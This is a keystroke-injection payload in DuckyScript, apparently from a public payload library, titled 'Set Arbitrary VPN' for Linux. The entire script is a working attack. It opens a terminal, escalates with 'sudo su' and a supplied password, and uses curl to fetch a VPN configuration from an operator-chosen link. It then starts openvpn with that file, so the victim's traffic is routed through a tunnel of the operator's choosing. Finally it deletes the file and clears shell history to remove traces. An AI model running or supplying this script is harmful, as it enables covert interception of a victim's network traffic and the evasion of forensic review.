Path: blob/master/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
2971 views
1REM ####################################2REM # |3REM # Title : Set Arbitrary VPN |4REM # Author : Aleff |5REM # Version : 1.0 |6REM # Category : Execution |7REM # Target : Linux |8REM # |9REM ####################################1011REM Requirements:12REM - Permissions13REM - Internet Connection14REM - 'openvpn' installed1516REM REQUIRED: You need to know the sudo password and replace 'example' with this17DEFINE SUDO_PASS example18REM REQUIRED: Set your VPN file configuration replacing example.com with your own link19DEFINE VPN_FILE_LINK example.com2021DELAY 100022CTRL-ALT t23DELAY 2000242526REM #### PERMISSIONS SECTION ####272829STRING sudo su30ENTER31DELAY 100032STRING SUDO_PASS33ENTER34DELAY 1000353637REM #### VPN SECTION ####383940STRING curl41STRING VPN_FILE_LINK42STRING > vpn_configuration.ovpn43ENTER44REM It depends by the internet connection45DELAY 20004647STRING openvpn vpn_configuration.ovpn48REM It depends by the computer power49DELAY 2000505152REM #### REMOVE TRACES ####535455STRING rm vpn_configuration.ovpn56ENTER57DELAY 5005859STRING history -c60ENTER61DELAY 5006263REM Exit from Sudo user64STRING exit65ENTER66DELAY 5006768REM Close the shell69STRING exit70ENTER717273